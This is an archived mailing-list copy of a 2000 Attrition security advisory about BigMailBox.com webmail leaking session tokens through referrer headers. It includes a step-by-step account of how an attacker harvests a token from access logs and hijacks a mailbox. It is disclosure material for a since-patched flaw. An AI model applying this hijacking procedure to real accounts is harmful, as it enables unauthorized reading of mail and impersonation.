A.L.E.R.T.: BigMailBox.com href tokens leave mailboxes open to

From: Cancer Omega (comegaat_private)
Date: Mon Feb 21 2000 - 13:35:46 PST

  • Next message: Jochen Bauer: "Re: unused bit attack alert"

    attrition.2000-02-21.bigmailbox                     Thu Feb 10 10:57:57 CST 2000
    Vendor: BigMailBox.com                              Platform: All
                       Attrition's Little Errata Report Team
                            -<)  A . L . E . R . T  (>-
           This advisory reports  a  recently-discovered security issue.
           It may contain a workaround or information on where to obtain
           an appropriate patch.  Advisories should be considered urgent
           as these notices are written only when the likelihood of wide
           impact is determined by the Attrition staff.  An HTML version
           of this and other advisories can be found at Attrition.Org at
      BigMailBox.com href tokens leave mailboxes open to control by a malicious site
    - ---------------------------------------------------------------------------
    - - Users of the BigMailBox.com email
    - - Users of freemail systems run by BigMailBox.com
    - ---------------------------------------------------------------------------
    BigMailBox.com was notified of the problem on Fri, 11 Feb 2000. After
    additional testing and verification, staff of BigMailBox.com patched
    the vulnerability on Mon, 14 Feb 2000.
    - ---------------------------------------------------------------------------
    BigMailBox.com (http://www.bigmailbox.com) offers free Web-based email
    services with the site's domain name.  BigMailBox.com also offers individual
    email accounts through the portal site www.gohip.com (http://www.gohip.com).
    We were able to find over 100 domains using BigMailBox.com to host their
    email services, including, Antionline (http://www.antionline.com), Teen Zone
    (http://www.teenzone.com), Anonymous.to (http://www.anonymous.to), CashPile
    (http://www.cashpile.com), and TeamsterNet (http://www.teamster.net).  As
    can be seen from this list, most of these are smaller portal sites using
    free email for repeat traffic.
    - ---------------------------------------------------------------------------
    As we browse the web, client programs such as Netscape and Internet Explorer
    forward a variable from one web server to another based on hyperlinks. This
    variable is called an HREF. It contains the URL of the site that referred the
    user to another server. When the web visitor clicks on a hyperlink, the HREF
    variable is forwarded to the next server, where it appears in the access logs.
    Looking at a sample entry of an access log:
      your.machine.com - - [10/Feb/2000:22:34:30 -0700] "GET /index.html HTTP/1.0"
      200 48797 "http://remote.site.com/" "Mozilla/4.7 [en] (Win98; I)"
    This shows that your.machine.com requested a web page "/index.html" on the
    server, and that you found this link from a web page hosted on
    BigMailBox.com uses a session token to manage access to the mail box.  This
    session token tells the system that a user is logged in and accessing mail.
    When the user logs out, the session token is automatically expired, forcing
    the user to log in which generates a fresh token. Without logging out, this
    token defaults to expire one hour after initial login.
    Unfortunately, this session token is forwarded to a web site via the HREF
    variable if a link is followed from an email message. With this valid session
    token, users reading these logs can use the information to log into the
    BigMailBox.com web email accounts without authentication.
    Several factors contribute to this being a serious problem.
            *  Many systems keep access logs world readable, so that any
               system user could glean the session key from the logs.
            *  Because of the standard format of the URL required to access
               the email, it is trivial to construct a valid URL along with
               a current session token allowing a third party to view the
               mail box.
            *  BigMailBox.com's web based mail client automatically converts
               all URL's into hotlinks to the site.
            *  With the knowledge of the above, a third party can send
               the user mail with a specific URL, encouraging them to visit
               a site where the session token could be read.
    1. A potential attacker sends the target a piece of e-mail with a 'bait'
       URL, in hopes of prompting them to follow the link. For example,
       sending mail to victimat_private with a URL for them to visit:
    2. BigMailBox receives the e-mail and converts the URL into a clickable
       hotlink. The victim reads the e-mail and follows the link with a
       single click.
    3. www.myserver.com records the hit to its access_log where the attacker
       is waiting. The attacker views the HREF of the entry:
       Using the HREF, the attacker extracts the e-mail account name designated
       by "un=" (UserName). In the example above: victim
       Looking closely at the end of the HREF, the attacker extracts the last
       field designated by "uid=", which is the current session token. In this
       example, the session token is: BVZkfObYaz4BZUXWkxPz2ZAvt
    4. Using the two fields, the attacker crafts a new URL:
       Putting this into their own browser, they can bypass the login procedure
       and access the web based e-mail account unchallenged.
    >From this point, the attacker wields full control over the account
    and may do a number of things:
            * Send mail to anyone as the legitimate user
            * Read and manipulate any mail already received
            * Change the default timeout from one hour to three hours
            * Modify user account information
    - ---------------------------------------------------------------------------
    Never click on a URL sent to you via e-mail to any BigMailBox.com email
    account. Instead, cut and paste the URL into your browser to visit a site.
    Contact BigMailBox and complain about shoddy and insecure e-mail access.
    - ---------------------------------------------------------------------------
    How many times must the security community point out trivial vulnerabilities
    like this? Worse, that 'security' and 'privacy' oriented sites like
    AntiOnline and Anonymous.to would utilize such insecure third party
    servers without testing or auditing them to maintain a reasonable level
    of security.
    - ---------------------------------------------------------------------------
    ADVISORY: Authored by Munge and Jericho
    VULNERABILITY: Found by Mcintyre
    - ---------------------------------------------------------------------------
    Questions regarding this advisory or information regarding new advisories
    and potential vulnerabilities should be directed to ALERT using one of the
    following methods:
    E-Mail: alertat_private
    WWW   : http://www.attrition.org/security/attrition.html
    The ALERT PGP Public Key (PGP v2.6.2, RSA) is available at:
    Version: 2.6.2
    -----END PGP SIGNATURE-----

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:36:33 PDT